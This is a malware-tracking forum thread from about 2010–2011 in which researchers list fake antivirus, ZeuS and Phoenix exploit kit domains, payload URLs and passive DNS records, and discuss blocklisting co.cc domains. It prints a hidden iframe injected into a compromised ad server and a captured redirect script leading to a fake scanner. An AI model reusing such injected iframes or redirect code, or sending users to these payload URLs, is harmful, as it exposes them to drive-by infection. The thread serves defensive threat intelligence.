Malware Domain List
Malware Related => Malicious Domains => Topic started by: eoin.miller on June 18, 2010, 04:30:09 pm
-
This thread is for the one off's we find.
Fake Scanner Pages:
www2.routesave19.co.cc
www2.netguard37-pd.co.cc
http://www2.routesave19.co.cc/Images/loading.gif
http://www2.routesave19.co.cc/Layouts/Landings/CentralLandings/7/images/list/main_sprite.jpg
-
FakeAV infected clients POST'ing to:
wellsellit.com
http://wellsellit.com/borders.php
-
Exploited clients posting to:
lolopingtroll.org/stats/gate.php?id=84fefcb9
and pulling from:
pulselocums.com.au/media/sound.exe
VirusTotal says its ZeuS:
http://www.virustotal.com/analisis/191d6ac238d6684a385380826bcf34f2698632c2ca9fbc57f4143b0310ea5cc0-1277240374
-
Fake Scanners:
www1.softscaner35.co.cc
www1.softscaner36.co.cc
www2.newbless6.co.cc
www1.softscaner34.co.cc
All have the following URL accessible:
/Layouts/Landings/CentralLandings/7/images/list/main_sprite.jpg
-
More fake scanner pages:
http://www1.trytocleanit-45p.co.cc
http://www1.avsolution31pr.co.cc
http://www2.lordofsave9.co.cc
http://www2.lordofsave4.co.cc
-
Fake Scanners:
www1.glory4.co.cc
www1.glory3.co.cc
-
Fake Scanner Pages:
www1.oksave9.co.cc
Redirectors to Fake Scanner Pages:
www3.avsolution42.co.cc
-
FakeAV page:
http://antivirglass.com/purchase?pgid=2&r=57.5
-
FakeAV:
http://business.one.strangled.net/3/?c=917
Redirects to FakeAV:
http://pivfeels.com/mytds/go.php?s=17
-
Phoenix Exploit kit:
http://decorum76.info/e9t/
More domains on same IP with exploit kits:
decoy56.info/e9t/
extraditelbds.info/e9t/
erratic335.info/e9t/
magnatevhl8.info/q8s/
bristlejfgj8.info/e9t/
inclination19y.info/x0c/
-
Drive by's with very low detection rates (1/41):
http://domger.in/d/
VirusTotal Payload Results:
http://www.virustotal.com/analisis/1f75ef5ae8b8c0a8cc13242cd22a75c0e45f443b9a6fe8906287b9c1e6bbb3bb-1279005248
-
Phoenix drive by kits:
http://whetcb67.info/n21/ - drive by
http://fglq.info/n2l/l.php?i=3 - payload
-
http://333.gorgrengos.com/b/index.php - driveby
-
Drive by:
www.hezhexh.co.cc/x33/
Seeing hacked forums redirect to this (via rpzrtru.co.cc/tds/in.cgi?default). Example of hacked forum link that leads to this drive by:
http://www.bicycles.net.au/forums/viewtopic.php?f=9&t=31289&start=25
-
Drive by:
www.hezhexh.co.cc/x33/
Seeing hacked forums redirect to this (via rpzrtru.co.cc/tds/in.cgi?default). Example of hacked forum link that leads to this drive by:
http://www.bicycles.net.au/forums/viewtopic.php?f=9&t=31289&start=25
The Openx adserver has been compromised.
http://www.bicycles.net.au/adserver/www/delivery/spc.php?zones=1|2|3
var OA_output = new Array();
OA_output['1'] = '';
OA_output['2'] = '';
OA_output['3'] = '';
OA_output['3'] += "<"+"a href=\'http://www.bicycles.net.au/adserver/www/delivery/ck.php?oaparams=2__bannerid=20__zoneid=3__cb=82c8d8ab02__oadest=http%3A%2F%2Fwww.cyclechallenge.com%2FThe-Event-1%2FInternational-Riders%2FWin-a-trip-to-Cycle-Challenge%2Fdefault.aspx\' target=\'_blank\'><"+"img src=\'http://www.bicycles.net.au/adserver/www/images/b9e4c50eff89401296bf4b6e66125934.gif\' width=\'120\' height=\'80\' alt=\'Competition: Contact Lake Taupo Cycle Challenge\' title=\'Competition: Contact Lake Taupo Cycle Challenge\' border=\'0\' /><"+"/a><"+"div id=\'beacon_82c8d8ab02\' style=\'position: absolute; left: 0px; top: 0px; visibility: hidden;\'><"+"img src=\'http://www.bicycles.net.au/adserver/www/delivery/lg.php?bannerid=20&campaignid=8&zoneid=3&cb=82c8d8ab02\' width=\'0\' height=\'0\' alt=\'\' style=\'width: 0px; height: 0px;\' /><"+"/div><"+"iframe src=\"http://rpzrtru.co.cc/tds/in.cgi?default\" width=\"1\" height=\"1\" hspace=\"0\" vspace=\"0\" frameborder=\"0\" scrolling=\"no\"><"+"/iframe>\n";
-
borat-carrer.com/img/index.php - Phoenix Exploit Kit
-
trade-yourauto.info/s/index.php - Phoenix Exploit Kit
trade-yourauto.info/s/tmp/des.jar - Java Exploit
-
jazzstibbtm.com/aa/index.php - phoenix exploit kit
79.135.152.222/a/index.php - phoenix exploit kit
brittnom.com/038512946/news.php - phoenix exploit kit
http://193.169.235.225/?q=Z5249FKA1J61R99H14NWY1W0J6VOWW67ZECX0K1Y8N4DO010Y52DNG9D847NNN4TV4VL0Y9V79UU09XWZW8D9ZE50K0XEJISRkiJU06WW47XUUpVmsnMyVaMkk2Qj8iMitKBmlybWoCfB9uCGANdzMBTQElAU50d3BfdlkMACh%252BegVkbw1veFZgW28CXWFmVl09Nj9nATgIaH0GCH0GAQcGTSM4NQ%253D%253D - Fake Scanner Page
http://193.169.235.225/?q=asdf - payload (can be anything after the q= really)
-
http://h26heh1.co.cc/x6dmrk2/ - drive by
jsunpack results:
http://jsunpack.jeek.org/dec/go?report=8f812b03d3390d1476b1c4f112e62cd4c8496ae2
-
http://stepanola.in:8080/axb/ - drive by (eleonore IIRC)
-
Phoenix Exploit Kit:
68.68.20.113 - fun.anexelymoweq.in
Redirector (second stage):
78.46.75.144 - verystrangeone.com/in.cgi?13
Redirector (first stage):
174.137.146.174 - 174.137.146.174/?cbb=27867330230596
-
Seeing this one being redirected to by hacked Drupal websites:
Phoenix Exploit Kit:
62.122.73.51 - http://besimorr.com/images/start.php?id=vlnd
Other hostnames via passive DNS:
cubbypa.com A 62.122.73.51
ns1.cubbypa.com A 62.122.73.51
ns2.cubbypa.com A 62.122.73.51
chinapinkpig.com A 62.122.73.51
ns1.chinapinkpig.com A 62.122.73.51
ns2.chinapinkpig.com A 62.122.73.51
boxberil.com A 62.122.73.51
ns1.boxberil.com A 62.122.73.51
ns2.boxberil.com A 62.122.73.51
disreco.com A 62.122.73.51
ns1.disreco.com A 62.122.73.51
ns2.disreco.com A 62.122.73.51
besimorr.com A 62.122.73.51
ns1.besimorr.com A 62.122.73.51
ns2.besimorr.com A 62.122.73.51
delilit.com A 62.122.73.51
ns1.delilit.com A 62.122.73.51
ns2.delilit.com A 62.122.73.51
ns1.youtubesxx.com A 62.122.73.51
ns2.youtubesxx.com A 62.122.73.51
62.122.73.52 seems to be bound to the same host as well:
boxberil.com A 62.122.73.52
shoughbo.com A 62.122.73.52
ns1.shoughbo.com A 62.122.73.52
ns2.shoughbo.com A 62.122.73.52
delilit.com A 62.122.73.52
youtubesxx.com A 62.122.73.52
heh:
/home/shayai/public_html/index.php
I <3 php error reporting
-
Another phoenix kit having traffic driven to it from exploited domains:
http://boxberil.com/images/start.php?id=vlnd
-
More phoenix:
91.193.192.90 - http://7tokk.cz.cc/vo/ithsaoj.php
Uses SEO poisoning to drive users to it.
-
A while back I configured DNS to not resolve any co.cc or cz.cc domains at all. I have not had any business impact after doing this and this and this is for a Fortune 500 company. I recommend you do the same.
-Seedler
-
A while back I configured DNS to not resolve any co.cc or cz.cc domains at all. I have not had any business impact after doing this and this and this is for a Fortune 500 company. I recommend you do the same.
-Seedler
I blocked co.cc and cz.cc domains on proxy servers of a large company and haven't had any business impact. I can recommend that too.
-
A while back I configured DNS to not resolve any co.cc or cz.cc domains at all. I have not had any business impact after doing this and this and this is for a Fortune 500 company. I recommend you do the same.
-Seedler
I blocked co.cc and cz.cc domains on proxy servers of a large company and haven't had any business impact. I can recommend that too.
We do that as well for an 80k+ user network. I also wrote the Snort sigs that look for these domains in HTTP requests and alert on them as suspicious through the EmergingThreats snort users group ;)
-
More Phoenix:
thruleni.com/images/start.php?id=wag5 - 62.122.73.53
IP is already in theMDL with another hostname but is listed as "fake av".
-
Phoenix Kits:
advancedwebanalytic.com/stats/fnktcnfza3.php
zlenbigret.com/03oofm059mw.php?s=IBCCL
-
More phoenix:
web-statistics-css.ru/n3/xndobob.php
anyone going to bible.com is getting redirected to this currently.
-
More Phoenix:
www.zanupoits.com
http://www.zanupoits.com/722quoct6k.php?s=IBCCM
Looks to be fluxing.
-
174.127.87.104 - various host names
This is redirectiong to lots of fake scanner pages like freeantiagencyxp.com. Definately needs to be listed. Doing some more intel on this now....
GET /?s=18 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-e
xcel, application/vnd.ms-powerpoint, application/msword, application/x-shockwave-
flash, */*
Referer: http://getmediacontent.com/145/40brands/banner.html
Accept-Language: en-us
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1; .NET C
LR 2.0.50727)
Host: 30kuil1.iodelivery.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Thu, 24 Mar 2011 13:53:28 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Content-Length: 861
Connection: close
Content-Type: text/html; charset=UTF-8
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=uft8">
<title>404 Not Found</title>
<script>
if (window.top != window.parent.parent) window.top.location.href="http://xpscanan
tiviruscentral.com/index2.php?06abQDU9QUDBV2v7rCw7i8WveTo6MHVmLVpZeCOrV1lTN5AlQy2
K";
</script>
</head>
<body>
<h1>Not Found</h1>
<p>The requested URL /index.html was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.
</p>
<hr>
<address>Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_p
assthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Port 80</address>
</body>
</html>